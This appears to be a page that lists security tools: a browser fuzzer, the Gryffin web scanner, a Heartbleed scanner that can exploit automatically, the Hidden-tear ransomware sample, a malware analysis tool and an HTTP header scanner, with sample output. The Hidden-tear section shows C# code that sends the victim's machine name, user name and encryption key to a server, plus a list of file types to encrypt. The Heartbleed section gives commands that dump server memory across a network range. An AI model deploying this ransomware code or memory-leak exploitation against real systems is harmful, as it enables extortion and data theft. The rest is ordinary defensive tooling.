
System Requirements

A Grinder Node requires a 32/64-bit Windows system and Ruby 2.0 (Ruby 1.9 is also supported but you won't be able to fuzz 64-bit targets).
A Grinder Server requires a web server with MySQL and PHP.

Features

Grinder Server features:
  • Multi-user web application. Users can log in and manage all crashes reported by the Grinder Nodes. Administrators can create more users and view the login history.
  • Users can view the status of the Grinder system. The activity of all nodes in the system is shown including status information such as average testcases being run per minute, the total crashes a node has generated and the last time a node generated a crash.
  • Users can view all of the crashes in the system and sort them by node, target, fuzzer, type, hash, time or count.
  • Users can view crash statistics for the fuzzers, including total and unique crashes per fuzzer and the targets each fuzzer is generating crashes on.
  • Users can hide all duplicate crashes so as to only show unique crashes in the system in order to easily manage new crashes as they occur.
  • Users can assign crashes to one another as well as mark a particular crash as interesting, exploitable, uninteresting or unknown.
  • Users can store written notes for a particular crash (viewable to all other users) to help manage them.
  • Users can download individual crash log files to help debug and recreate testcases.
  • Users can create custom filters to exclude uninteresting crashes from the list of crashes.
  • Users can create custom e-mail alerts to alert them when a new crash that matches specific criteria comes into the system.
  • Users can change their password and e-mail address on the system as well as view their own login history.
Grinder Node features:
  • A node can be brought up and begin fuzzing any supported browser via a single command.
  • A node injects a logging DLL into the target browser process to help the fuzzers perform logging in order to recreate testcases at a later stage.
  • A node records useful crash information such as call stack, stack dump, code dump and register info and also includes any available symbol information.
  • A node can automatically encrypt all crash information with an RSA public key.
  • A node can automatically report new crashes to a remote Grinder Server.
  • A node can run largely unattended for a long period of time.

Download Grinder

Gryffin - Large Scale Web Security Scanning Platform

Gryffin is a large scale web security scanning platform. It is not yet another scanner. It was written to solve two specific problems with existing scanners: coverage and scale.

Better coverage translates to fewer false negatives. Inherent scalability translates to the capability of scanning and supporting a large, elastic application infrastructure. Simply put, the ability to go from scanning 1000 applications today to 100,000 applications tomorrow by straightforward horizontal scaling.

Coverage
Coverage has two dimensions: one during crawl and the other during fuzzing. In the crawl phase, coverage means being able to find as much of the application footprint as possible. In the scan phase, or while fuzzing, it means being able to test each part of the application in depth for an applied set of vulnerabilities.

Crawl Coverage
Today a large number of web applications are template-driven, meaning the same code or path generates millions of URLs. A security scanner needs just one of the millions of URLs generated by the same code or path. Gryffin's crawler does just that.

Page Deduplication
At the heart of Gryffin is a deduplication engine that compares a new page with already seen pages. If the HTML structure of the new page is similar to those already seen, it is classified as a duplicate and not crawled further.
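
The following is an added example, not Gryffin's own code, of the structural deduplication idea described above: a page's structure is taken to be the sequence of its HTML tag names (text and attribute values ignored), fingerprinted as a set of tag trigrams and compared with Jaccard similarity. The sample pages and the 0.9 threshold are assumptions of this example, not Gryffin settings.

```python
# Added example (not Gryffin's code): template-level page deduplication.
# A page is a duplicate when the Jaccard similarity of its tag-trigram set
# with an already seen page reaches the threshold (0.9 here, an assumption).
from html.parser import HTMLParser


class TagSequence(HTMLParser):
    """Collects start and end tag names in document order, discarding text and attributes."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)

    def handle_endtag(self, tag):
        self.tags.append("/" + tag)


def structure_shingles(html, n=3):
    """Return the set of n-grams over the page's tag sequence (its structural fingerprint)."""
    parser = TagSequence()
    parser.feed(html)
    parser.close()
    tags = parser.tags
    if len(tags) < n:
        return {tuple(tags)}
    return {tuple(tags[i:i + n]) for i in range(len(tags) - n + 1)}


def similarity(a, b):
    """Jaccard similarity of two shingle sets: 1.0 means identical structure."""
    if not a and not b:
        return 1.0
    return len(a & b) / len(a | b)


class Deduplicator:
    """Remembers the fingerprint of every page crawled so far and answers 'seen this template?'."""

    def __init__(self, threshold=0.9):
        self.threshold = threshold
        self.seen = []  # list of (url, shingle set)

    def is_duplicate(self, url, html):
        """True if the structure matches a previously seen page; otherwise records the page."""
        shingles = structure_shingles(html)
        if any(similarity(shingles, s) >= self.threshold for _, s in self.seen):
            return True
        self.seen.append((url, shingles))
        return False


# Constructed sample pages: two product pages rendered by the same template,
# a search page, and a product page with one extra element (a near duplicate).
SAMPLE_PAGES = [
    ("/p/1", '<html><body><div class="product"><h1>Blue mug</h1><p>Price: 5</p>'
             '<a href="/buy?id=1">Buy</a></div></body></html>'),
    ("/p/2", '<html><body><div class="product"><h1>Red mug</h1><p>Price: 7</p>'
             '<a href="/buy?id=2">Buy</a></div></body></html>'),
    ("/search", '<html><body><form><input name="q"><button>Go</button></form>'
                '<ul><li>a</li><li>b</li></ul></body></html>'),
    ("/p/3", '<html><body><div class="product"><h1>Green mug</h1><p>Price: 9</p>'
             '<span class="sale">Sale</span><a href="/buy?id=3">Buy</a></div></body></html>'),
]


def crawl_decisions(pages, threshold=0.9):
    """Return [(url, is_duplicate), ...] in crawl order; duplicates would not be crawled further."""
    dedup = Deduplicator(threshold)
    return [(url, dedup.is_duplicate(url, html)) for url, html in pages]


if __name__ == "__main__":
    for url, dup in crawl_decisions(SAMPLE_PAGES):
        print(f"{url:<10} {'duplicate, skip' if dup else 'new template, crawl'}")
```

Lowering the threshold makes the near-duplicate /p/3 collapse into /p/1 as well, which is the trade-off between crawl coverage and crawl cost that the text describes.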

DOM Rendering and Navigation
A large number of applications today are rich applications. They are heavily driven by client-side JavaScript. In order to discover links and code paths in such applications, Gryffin's crawler uses PhantomJS for DOM rendering and navigation.

Scan Coverage
As Gryffin is a scanning platform, not a scanner, it does not have its own fuzzer modules, even for fuzzing common web vulnerabilities like XSS and SQL Injection.
It's not wise to reinvent the wheel where you do not have to. Gryffin at production scale at Yahoo uses open source and custom fuzzers. Some of these custom fuzzers might be open sourced in the future, and might or might not be part of the Gryffin repository.
For demonstration purposes, Gryffin comes integrated with sqlmap and arachni. It does not endorse them or any other scanner in particular.
The philosophy is to improve scan coverage by being able to fuzz for just what you need.

Scale
While Gryffin is available as a standalone package, it's primarily built for scale.
Gryffin is built on the publisher-subscriber model. Each component is either a publisher, or a subscriber, or both. This allows Gryffin to scale horizontally by simply adding more subscriber or publisher nodes.

Operating Gryffin

Pre-requisites
  1. Go
  2. PhantomJS, v2
  3. Sqlmap (for fuzzing SQLi)
  4. Arachni (for fuzzing XSS and web vulnerabilities)
  5. NSQ,
    • running lookupd at port 4160,4161
    • running nsqd at port 4150,4151
    • with --max-msg-size=5000000
  6. Kibana and Elastic search, for dashboarding

Installation
go get github.com/yahoo/gryffin/...

Run

TODO

  1. Mobile browser user agent
  2. Preconfigured docker images
  3. Redis for sharing states across machines
  4. Instruction to run gryffin (distributed or standalone)
  5. Documentation for html-distance
  6. Implement a JSON serializable cookiejar.
  7. Identify duplicate url patterns based on simhash result.

Download Gryffin

Heartbleed Vulnerability Scanner - Network Scanner for OpenSSL Memory Leak (CVE-2014-0160)



Heartbleed Vulnerability Scanner is a multiprotocol (HTTP, IMAP, SMTP, POP) CVE-2014-0160 scanning and automatic exploitation tool written in Python.

For scanning wide ranges automatically, you can provide a network range in CIDR notation and an output file to dump the memory of vulnerable systems for later checking.

Heartbleed Vulnerability Scanner can also get targets from a list file. This is useful if you already have a list of systems using SSL services such as HTTPS, POP3S, SMTPS or IMAPS.
git clone https://github.com/hybridus/heartbleedscanner.git

Sample usage

To scan your local 192.168.1.0/24 network for heartbleed vulnerability (https/443) and save the leaks into a file:
python heartbleedscan.py -n 192.168.1.0/24 -f localscan.txt -r

To scan the same network against SMTP over SSL/TLS and randomize the IP addresses:
python heartbleedscan.py -n 192.168.1.0/24 -p 25 -s SMTP -r

If you already have a target list which you created using nmap/zmap:
python heartbleedscan.py -i targetlist.txt

Dependencies

Before using Heartbleed Vulnerability Scanner, you should install python-netaddr package.

CentOS or CentOS-like systems :
yum install python-netaddr

Ubuntu or Debian-like systems :
apt-get install python-netaddr


Download Heartbleed Vulnerability Scanner

Hidden-tear - An open source ransomware-like file crypter

     _     _     _     _              _                  
    | |   (_)   | |   | |            | |                 
    | |__  _  __| | __| | ___ _ __   | |_ ___  __ _ _ __ 
    | '_ \| |/ _` |/ _` |/ _ \ '_ \  | __/ _ \/ _` | '__|
    | | | | | (_| | (_| |  __/ | | | | ||  __/ (_| | |   
    |_| |_|_|\__,_|\__,_|\___|_| |_|  \__\___|\__,_|_|   

It's a ransomware-like file crypter sample which can be modified for specific purposes.

Features
  • Uses the AES algorithm to encrypt files.
  • Sends the encryption key to a server.
  • Encrypted files can be decrypted in the decrypter program with the encryption key.
  • Creates a text file on the Desktop with a given message.
  • Small file size (12 KB)
  • Not detected by antivirus programs (15/08/2015) http://nodistribute.com/result/6a4jDwi83Fzt

Usage
  • You need to have a web server which supports scripting languages like PHP, Python etc. Change this line to your URL. (You had better use an HTTPS connection to avoid eavesdropping.)
    string targetURL = "https://www.example.com/hidden-tear/write.php?info=";
  • The script should write the GET parameter to a text file. The sending process runs in the SendPassword() function:
    string info = computerName + "-" + userName + " " + password;
    var fullUrl = targetURL + info;
    var conent = new System.Net.WebClient().DownloadString(fullUrl);
    
  • Target file extensions can be changed. Default list:
var validExtensions = new[]{".txt", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".odt", ".jpg", ".png", ".csv", ".sql", ".mdb", ".sln", ".php", ".asp", ".aspx", ".html", ".xml", ".psd"};

Legal Warning

While this may be helpful for some, there are significant risks. hidden tear may be used only for Educational Purposes. Do not use it as a ransomware! You could go to jail on obstruction of justice charges just for running hidden tear, even though you are innocent.


Download Hidden-tear

Hook Analyser 3.2 - Malware Analysis Tool


Hook Analyser is a freeware application which allows an investigator/analyst to perform “static & run-time / dynamic” analysis of suspicious applications, and also to gather (analyse & correlate) threat intelligence related information (or data) from various open sources on the Internet.

Essentially it’s a malware analysis tool that has evolved to add some cyber threat intelligence features & mapping.

Hook Analyser is perhaps the only “free” software on the market which combines malware analysis and cyber threat intelligence capabilities. The software has been used by major Fortune 500 organisations.

Features/Functionality
  • Spawn and Hook to Application – Enables you to spawn an application, and hook into it
  • Hook to a specific running process – Allows you to hook to a running (active) process
  • Static Malware Analysis – Scans PE/Windows executables to identify potential malware traces
  • Application crash analysis – Allows you to analyse memory content when an application crashes
  • Exe extractor – This module essentially extracts executables from running process/s

Release 

In this release, significant improvements and capabilities have been added to the Threat Intelligence module.

Following are the key improvements and enhanced features:

  • The malware analysis module has been improved and new signatures have been added
  • Cyber Threat Intelligence module:
    • IP Intelligence module (analyse multiple IP addresses instead of just one)
    • Keyword Intelligence module (analyse keywords, e.g. Internet Explorer 11, IP address, hash etc.)
    • Network file (PCAP) analysis: analyses a user-provided .PCAP file and performs analysis on external IP addresses
    • Social Intelligence: pulls data from Twitter for user-defined keywords and performs network analysis


Let's look at how to use this release (Cyber Threat Intelligence).

The tool can perform analysis via two methods: auto mode and manual mode.

In auto mode, the tool uses the following files for analysis:

  1. Channels.txt (Path: feeds->channels.txt): Specify the list of Twitter-related channels or keywords for monitoring. In auto mode, monitoring is performed for 2 minutes only; if you'd like to monitor indefinitely, select manual mode.
  2. intelligence-ipdb.txt (Path: feeds->intelligence-ipdb.txt): Specify the list of IP addresses you'd like to analyse. You can provide as many IPs as you'd like.
  3. Keywords.txt (Path: feeds->Keywords.txt): Specify the list of keywords you'd like to analyse. You can provide as many keywords as you'd like.
  4. rssurl.txt (Path: feeds->rssurl.txt): Specify the RSS feeds to fetch vulnerability-related information.
  5. url.txt (Path: feeds->url.txt): Specify the list of URLs from which the tool will pull malicious IP address information.

The Threat Intel module can be executed from the HookAnalyser3.2.exe file (option #6) or directly through the ThreatIntel.exe file. Refer to the following screenshots.

In manual mode, you need to provide the filename as an argument. Example below:


Important note - The software shall only be used for "NON-COMMERCIAL" purposes. For commercial usage, written permission from the Author must be obtained prior to use.


Download Hook Analyser 3.2

Hsecscan - A Security Scanner For HTTP Response Headers

hsecscan
A security scanner for HTTP response headers.

Requirements
Python 2.x

Usage
$ ./hsecscan.py 
usage: hsecscan.py [-h] [-P] [-p] [-u URL] [-R] [-U User-Agent]
                   [-d 'POST data'] [-x PROXY]

A security scanner for HTTP response headers.

optional arguments:
  -h, --help            show this help message and exit
  -P, --database        Print the entire response headers database.
  -p, --headers         Print only the enabled response headers from database.
  -u URL, --URL URL     The URL to be scanned.
  -R, --redirect        Print redirect headers.
  -U User-Agent, --useragent User-Agent
                        Set the User-Agent request header (default: hsecscan).
  -d 'POST data', --postdata 'POST data'
                        Set the POST data (between single quotes) otherwise
                        will be a GET (example: '{ "q":"query string",
                        "foo":"bar" }').
  -x PROXY, --proxy PROXY
                        Set the proxy server (example: 192.168.1.1:8080).
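
The following is an added example, not hsecscan's own code, of the kind of rule set such a scanner applies to a response: it parses a constructed raw HTTP response and flags a cookie set over HTTPS without the Secure attribute (CWE-614, as in the sample run further down), an X-XSS-Protection header that is absent or not "1; mode=block" (CWE-79), a missing Strict-Transport-Security header, and enabled range requests. The rules, the sample response and the finding texts are assumptions of the example.

```python
# Added example (not hsecscan's code): a small HTTP response-header checker.
from collections import namedtuple

Finding = namedtuple("Finding", "header cwe message")

# Constructed sample response, modelled on the kind of headers a real server returns.
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Date: Sun, 08 Nov 2015 14:12:18 GMT\r\n"
    "Content-Type: text/html; charset=ISO-8859-1\r\n"
    "X-XSS-Protection: 1; mode=block\r\n"
    "X-Frame-Options: SAMEORIGIN\r\n"
    "Set-Cookie: PREF=ID=1111111111111111; expires=Thu, 31-Dec-2015 16:02:17 GMT; "
    "path=/; domain=.example.com\r\n"
    "Set-Cookie: NID=73=abc; expires=Mon, 09-May-2016 14:12:18 GMT; path=/; "
    "domain=.example.com; HttpOnly\r\n"
    "Accept-Ranges: none\r\n"
    "Connection: close\r\n"
    "\r\n"
    "<html><body>hello</body></html>"
)


def parse_response(raw):
    """Split a raw HTTP/1.x response into (status_code, [(name_lower, value), ...])."""
    head, _, _body = raw.partition("\r\n\r\n")
    status_line, *header_lines = head.split("\r\n")
    status = int(status_line.split()[1])
    headers = []
    for line in header_lines:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return status, headers


def cookie_attributes(set_cookie_value):
    """Return (cookie_name, {attribute_name_lower, ...}) for one Set-Cookie value."""
    parts = [p.strip() for p in set_cookie_value.split(";")]
    name = parts[0].split("=", 1)[0]
    attrs = {p.split("=", 1)[0].lower() for p in parts[1:]}
    return name, attrs


def scan_headers(raw, https=True):
    """Apply the header rules and return a list of Finding records (empty = nothing flagged)."""
    _status, headers = parse_response(raw)
    present = {name: value for name, value in headers}  # last value wins; fine for single-valued headers
    findings = []

    xss = present.get("x-xss-protection")
    if xss is None or xss.replace(" ", "").lower() != "1;mode=block":
        findings.append(Finding("X-XSS-Protection", "CWE-79", "absent or not '1; mode=block'"))

    if "x-frame-options" not in present:
        findings.append(Finding("X-Frame-Options", None, "missing; page may be framed by other origins"))

    if https and "strict-transport-security" not in present:
        findings.append(Finding("Strict-Transport-Security", None, "missing on an HTTPS response"))

    # Set-Cookie is multi-valued, so walk the raw list rather than the dict.
    for name, value in headers:
        if name != "set-cookie":
            continue
        cookie, attrs = cookie_attributes(value)
        if https and "secure" not in attrs:
            findings.append(Finding("Set-Cookie", "CWE-614", f"cookie {cookie!r} set over HTTPS without Secure"))
        if "httponly" not in attrs:
            findings.append(Finding("Set-Cookie", None, f"cookie {cookie!r} readable by script (no HttpOnly)"))

    ranges = present.get("accept-ranges", "").lower()
    if ranges and ranges != "none":
        findings.append(Finding("Accept-Ranges", None, f"range requests enabled ({ranges}); limit overlapping ranges"))
    return findings


def count_by_cwe(findings):
    """Count findings per CWE id; None groups the informational ones."""
    counts = {}
    for f in findings:
        counts[f.cwe] = counts.get(f.cwe, 0) + 1
    return counts


if __name__ == "__main__":
    for f in scan_headers(SAMPLE_RESPONSE):
        print(f"{f.header:<26} {f.cwe or '-':<8} {f.message}")
```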


Example
$ ./hsecscan.py -u https://google.com
>> RESPONSE INFO <<
URL: https://www.google.com.br/?gfe_rd=cr&ei=Qlg_Vu-WHqWX8QeHraH4DQ
Code: 200
Headers:
 Date: Sun, 08 Nov 2015 14:12:18 GMT
 Expires: -1
 Cache-Control: private, max-age=0
 Content-Type: text/html; charset=ISO-8859-1
 P3P: CP="This is not a P3P policy! See http://www.google.com/support/accounts/bin/answer.py?hl=en&answer=151657 for more info."
 Server: gws
 X-XSS-Protection: 1; mode=block
 X-Frame-Options: SAMEORIGIN
 Set-Cookie: PREF=ID=1111111111111111:FF=0:TM=1446991938:LM=1446991938:V=1:S=wT722CJeTI8DR-6b; expires=Thu, 31-Dec-2015 16:02:17 GMT; path=/; domain=.google.com.br
 Set-Cookie: NID=73=IQTBy8sF0rXq3cu2hb3JHIYqEarBeft7Ciio6uPF2gChn2tj34-kRocXzBwPb6-BLABp0grZvHf7LQnRQ9Z_YhGgzt-oFrns3BMSIGoGn4BWBA48UtsFw4OsB5RZ4ODz1rZb9XjCYemyZw7e5ZJ5pWftv5DPul0; expires=Mon, 09-May-2016 14:12:18 GMT; path=/; domain=.google.com.br; HttpOnly
 Alternate-Protocol: 443:quic,p=1
 Alt-Svc: quic="www.google.com:443"; p="1"; ma=600,quic=":443"; p="1"; ma=600
 Accept-Ranges: none
 Vary: Accept-Encoding
 Connection: close

>> RESPONSE HEADERS DETAILS <<
Header Field Name: X-XSS-Protection
Value: 1; mode=block
Reference: http://blogs.msdn.com/b/ie/archive/2008/07/02/ie8-security-part-iv-the-xss-filter.aspx
Security Description: This header enables the Cross-site scripting (XSS) filter built into most recent web browsers. It's usually enabled by default anyway, so the role of this header is to re-enable the filter for this particular website if it was disabled by the user. This header is supported in IE 8+, and in Chrome (not sure which versions). The anti-XSS filter was added in Chrome 4. Its unknown if that version honored this header.
Security Reference: https://www.owasp.org/index.php/List_of_useful_HTTP_headers
Recommendations: Use "X-XSS-Protection: 1; mode=block" whenever is possible (ref. http://blogs.msdn.com/b/ieinternals/archive/2011/01/31/controlling-the-internet-explorer-xss-filter-with-the-x-xss-protection-http-header.aspx).
CWE: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CWE URL: https://cwe.mitre.org/data/definitions/79.html

Header Field Name: Set-Cookie
Value: PREF=ID=1111111111111111:FF=0:TM=1446991938:LM=1446991938:V=1:S=wT722CJeTI8DR-6b; expires=Thu, 31-Dec-2015 16:02:17 GMT; path=/; domain=.google.com.br, NID=73=IQTBy8sF0rXq3cu2hb3JHIYqEarBeft7Ciio6uPF2gChn2tj34-kRocXzBwPb6-BLABp0grZvHf7LQnRQ9Z_YhGgzt-oFrns3BMSIGoGn4BWBA48UtsFw4OsB5RZ4ODz1rZb9XjCYemyZw7e5ZJ5pWftv5DPul0; expires=Mon, 09-May-2016 14:12:18 GMT; path=/; domain=.google.com.br; HttpOnly
Reference: https://tools.ietf.org/html/rfc6265
Security Description: Cookies have a number of security pitfalls. In particular, cookies encourage developers to rely on ambient authority for authentication, often becoming vulnerable to attacks such as cross-site request forgery. Also, when storing session identifiers in cookies, developers often create session fixation vulnerabilities. Transport-layer encryption, such as that employed in HTTPS, is insufficient to prevent a network attacker from obtaining or altering a victim's cookies because the cookie protocol itself has various vulnerabilities. In addition, by default, cookies do not provide confidentiality or integrity from network attackers, even when used in conjunction with HTTPS.
Security Reference: https://tools.ietf.org/html/rfc6265#section-8
Recommendations: Please at least read these references: https://tools.ietf.org/html/rfc6265#section-8 and https://www.owasp.org/index.php/Session_Management_Cheat_Sheet#Cookies.
CWE: CWE-614: Sensitive Cookie in HTTPS Session Without 'Secure' Attribute
CWE URL: https://cwe.mitre.org/data/definitions/614.html

Header Field Name: Accept-Ranges
Value: none
Reference: https://tools.ietf.org/html/rfc7233#section-2.3
Security Description: Unconstrained multiple range requests are susceptible to denial-of-service attacks because the effort required to request many overlapping ranges of the same data is tiny compared to the time, memory, and bandwidth consumed by attempting to serve the requested data in many parts.
Security Reference: https://tools.ietf.org/html/rfc7233#section-6
Recommendations: Servers ought to ignore, coalesce, or reject egregious range requests, such as requests for more than two overlapping ranges or for many small ranges in a single set, particularly when the ranges are requested out of order for no apparent reason.
CWE: CWE-400: Uncontrolled Resource Consumption ('Resource Exhaustion')
CWE URL: https://cwe.mitre.org/data/definitions/400.html

Header Field Name: Expires
Value: -1
Reference: https://tools.ietf.org/html/rfc7234#section-5.3
Security Description:
Security Reference:
Recommendations:
CWE:
CWE URL:

Header Field Name: Vary
Value: Accept-Encoding
Reference: https://tools.ietf.org/html/rfc7231#section-7.1.4
Security Description:
Security Reference:
Recommendations:
CWE:
CWE URL:

Header Field Name: Server
Value: gws
Reference: https://tools.ietf.org/html/rfc7231#section-7.4.2
Security Description: Overly long and detailed Server field values increase response latency and potentially reveal internal implementation details that might make it (slightly) easier for attackers to find and exploit known security holes.
Security Reference: https://tools.ietf.org/html/rfc7231#section-7.4.2
Recommendations: An origin server SHOULD NOT generate a Server field containing needlessly fine-grained detail and SHOULD limit the addition of subproducts by third parties.
CWE: CWE-200: Information Exposure
CWE URL: https://cwe.mitre.org/data/definitions/200.html

Header Field Name: Connection
Value: close
Reference: https://tools.ietf.org/html/rfc7230#section-6.1
Security Description:
Security Reference:
Recommendations:
CWE:
CWE URL:

Header Field Name: Cache-Control
Value: private, max-age=0
Reference: https://tools.ietf.org/html/rfc7234#section-5.2
Security Description: Caches expose additional potential vulnerabilities, since the contents of the cache represent an attractive target for malicious exploitation.  Because cache contents persist after an HTTP request is complete, an attack on the cache can reveal information long after a user believes that the information has been removed from the network.  Therefore, cache contents need to be protected as sensitive information.
Security Reference: https://tools.ietf.org/html/rfc7234#section-8
Recommendations: Do not store unnecessarily sensitive information in the cache.
CWE: CWE-524: Information Exposure Through Caching
CWE URL: https://cwe.mitre.org/data/definitions/524.html

Header Field Name: Date
Value: Sun, 08 Nov 2015 14:12:18 GMT
Reference: https://tools.ietf.org/html/rfc7231#section-7.1.1.2
Security Description:
Security Reference:
Recommendations:
CWE:
CWE URL:

Header Field Name: P3P
Value: CP="This is not a P3P policy! See http://www.google.com/support/accounts/bin/answer.py?hl=en&answer=151657 for more info."
Reference: http://www.w3.org/TR/P3P11/#syntax_ext
Security Description: While P3P itself does not include security mechanisms, it is intended to be used in conjunction with security tools. Users' personal information should always be protected with reasonable security safeguards in keeping with the sensitivity of the information.
Security Reference: http://www.w3.org/TR/P3P11/#principles_security
Recommendations: -
CWE: -
CWE URL: -

Header Field Name: Content-Type
Value: text/html; charset=ISO-8859-1
Reference: https://tools.ietf.org/html/rfc7231#section-3.1.1.5
Security Description: In practice, resource owners do not always properly configure their origin server to provide the correct Content-Type for a given representation, with the result that some clients will examine a payload's content and override the specified type. Clients that do so risk drawing incorrect conclusions, which might expose additional security risks (e.g., "privilege escalation").
Security Reference: https://tools.ietf.org/html/rfc7231#section-3.1.1.5
Recommendations: Properly configure the origin server to provide the correct Content-Type for a given representation.
CWE: CWE-430: Deployment of Wrong Handler
CWE URL: https://cwe.mitre.org/data/definitions/430.html

Header Field Name: X-Frame-Options
Value: SAMEORIGIN
Reference: https://tools.ietf.org/html/rfc7034
Security Description: The use of "X-Frame-Options" allows a web page from host B to declare that its content (for example, a button, links, text, etc.) must not be displayed in a frame (<frame> or <iframe>) of another page (e.g., from host A). This is done by a policy declared in the HTTP header and enforced by browser implementations.
Security Reference: https://tools.ietf.org/html/rfc7034
Recommendations: In 2009 and 2010, many browser vendors ([Microsoft-X-Frame-Options] and [Mozilla-X-Frame-Options]) introduced the use of a non-standard HTTP [RFC2616] header field "X-Frame-Options" to protect against clickjacking. Please check here https://www.owasp.org/index.php/Clickjacking_Defense_Cheat_Sheet what's the best option for your case.
CWE: CWE-693: Protection Mechanism Failure
CWE URL: https://cwe.mitre.org/data/definitions/693.html

>> RESPONSE MISSING HEADERS <<
Header Field Name: Pragma
Reference: https://tools.ietf.org/html/rfc7234#section-5.4
Security Description: Caches expose additional potential vulnerabilities, since the contents of the cache represent an attractive target for malicious exploitation.
Security Reference: https://tools.ietf.org/html/rfc7234#section-8
Recommendations: The "Pragma" header field allows backwards compatibility with HTTP/1.0 caches, so that clients can specify a "no-cache" request that they will understand (as Cache-Control was not defined until HTTP/1.1). When the Cache-Control header field is also present and understood in a request, Pragma is ignored. Define "Pragma: no-cache" whenever possible.
CWE: CWE-524: Information Exposure Through Caching
CWE URL: https://cwe.mitre.org/data/definitions/524.html

Header Field Name: Public-Key-Pins
Reference: https://tools.ietf.org/html/rfc7469
Security Description: HTTP Public Key Pinning (HPKP) is a trust on first use security mechanism which protects HTTPS websites from impersonation using fraudulent certificates issued by compromised certificate authorities. The security context or pinset data is supplied by the site or origin.
Security Reference: https://tools.ietf.org/html/rfc7469
Recommendations: Deploying Public Key Pinning (PKP) safely will require operational and organizational maturity due to the risk that hosts may make themselves unavailable by pinning to a set of SPKIs that becomes invalid. With care, host operators can greatly reduce the risk of man-in-the-middle (MITM) attacks and other false-authentication problems for their users without incurring undue risk. PKP is meant to be used together with HTTP Strict Transport Security (HSTS) [RFC6797], but it is possible to pin keys without requiring HSTS.
CWE: CWE-295: Improper Certificate Validation
CWE URL: https://cwe.mitre.org/data/definitions/295.html

Header Field Name: Public-Key-Pins-Report-Only
Reference: https://tools.ietf.org/html/rfc7469
Security Description: HTTP Public Key Pinning (HPKP) is a trust on first use security mechanism which protects HTTPS websites from impersonation using fraudulent certificates issued by compromised certificate authorities. The security context or pinset data is supplied by the site or origin.
Security Reference: https://tools.ietf.org/html/rfc7469
Recommendations: Deploying Public Key Pinning (PKP) safely will require operational and organizational maturity due to the risk that hosts may make themselves unavailable by pinning to a set of SPKIs that becomes invalid. With care, host operators can greatly reduce the risk of man-in-the-middle (MITM) attacks and other false-authentication problems for their users without incurring undue risk. PKP is meant to be used together with HTTP Strict Transport Security (HSTS) [RFC6797], but it is possible to pin keys without requiring HSTS.
CWE: CWE-295: Improper Certificate Validation
CWE URL: https://cwe.mitre.org/data/definitions/295.html

Header Field Name: Strict-Transport-Security
Reference: https://tools.ietf.org/html/rfc6797
Security Description: HTTP Strict Transport Security (HSTS) is a web security policy mechanism which helps to protect secure HTTPS websites against downgrade attacks and cookie hijacking. It allows web servers to declare that web browsers (or other complying user agents) should only interact with it using secure HTTPS connections, and never via the insecure HTTP protocol. HSTS is an IETF standards track protocol and is specified in RFC 6797.
Security Reference: https://tools.ietf.org/html/rfc6797
Recommendations: Please at least read this reference: https://www.owasp.org/index.php/HTTP_Strict_Transport_Security.
CWE: CWE-311: Missing Encryption of Sensitive Data
CWE URL: https://cwe.mitre.org/data/definitions/311.html

Header Field Name: Frame-Options
Reference: https://tools.ietf.org/html/rfc7034
Security Description: The use of "X-Frame-Options" allows a web page from host B to declare that its content (for example, a button, links, text, etc.) must not be displayed in a frame (<frame> or <iframe>) of another page (e.g., from host A). This is done by a policy declared in the HTTP header and enforced by browser implementations.
Security Reference: https://tools.ietf.org/html/rfc7034
Recommendations: In 2009 and 2010, many browser vendors ([Microsoft-X-Frame-Options] and [Mozilla-X-Frame-Options]) introduced the use of a non-standard HTTP [RFC2616] header field "X-Frame-Options" to protect against clickjacking. Please check here https://www.owasp.org/index.php/Clickjacking_Defense_Cheat_Sheet what's the best option for your case.
CWE: CWE-693: Protection Mechanism Failure
CWE URL: https://cwe.mitre.org/data/definitions/693.html

Header Field Name: X-Content-Type-Options
Reference: http://blogs.msdn.com/b/ie/archive/2008/09/02/ie8-security-part-vi-beta-2-update.aspx
Security Description: The only defined value, "nosniff", prevents Internet Explorer and Google Chrome from MIME-sniffing a response away from the declared content-type. This also applies to Google Chrome, when downloading extensions. This reduces exposure to drive-by download attacks and sites serving user uploaded content that, by clever naming, could be treated by MSIE as executable or dynamic HTML files.
Security Reference: https://www.owasp.org/index.php/List_of_useful_HTTP_headers
Recommendations: Always use the only defined value, "nosniff".
CWE: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CWE URL: https://cwe.mitre.org/data/definitions/79.html

Header Field Name: Content-Security-Policy
Reference: http://www.w3.org/TR/CSP/
Security Description: Content Security Policy requires careful tuning and precise definition of the policy. If enabled, CSP has significant impact on the way browser renders pages (e.g., inline JavaScript disabled by default and must be explicitly allowed in policy). CSP prevents a wide range of attacks, including Cross-site scripting and other cross-site injections.
Security Reference: https://www.owasp.org/index.php/List_of_useful_HTTP_headers
Recommendations: Read the reference http://www.w3.org/TR/CSP/ and set according to your case. This is not an easy job.
CWE: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CWE URL: https://cwe.mitre.org/data/definitions/79.html

Header Field Name: X-Content-Security-Policy
Reference: http://www.w3.org/TR/CSP/
Security Description: Content Security Policy requires careful tuning and precise definition of the policy. If enabled, CSP has significant impact on the way browser renders pages (e.g., inline JavaScript disabled by default and must be explicitly allowed in policy). CSP prevents a wide range of attacks, including Cross-site scripting and other cross-site injections.
Security Reference: https://www.owasp.org/index.php/List_of_useful_HTTP_headers
Recommendations: Read the reference http://www.w3.org/TR/CSP/ and set according to your case. This is not an easy job.
CWE: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CWE URL: https://cwe.mitre.org/data/definitions/79.html

Header Field Name: X-WebKit-CSP
Reference: http://www.w3.org/TR/CSP/
Security Description: Content Security Policy requires careful tuning and precise definition of the policy. If enabled, CSP has significant impact on the way browser renders pages (e.g., inline JavaScript disabled by default and must be explicitly allowed in policy). CSP prevents a wide range of attacks, including Cross-site scripting and other cross-site injections.
Security Reference: https://www.owasp.org/index.php/List_of_useful_HTTP_headers
Recommendations: Read the reference http://www.w3.org/TR/CSP/ and set according to your case. This is not an easy job.
CWE: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CWE URL: https://cwe.mitre.org/data/definitions/79.html

Header Field Name: Content-Security-Policy-Report-Only
Reference: http://www.w3.org/TR/CSP/
Security Description: Like Content-Security-Policy, but only reports. Useful during implementation, tuning and testing efforts.
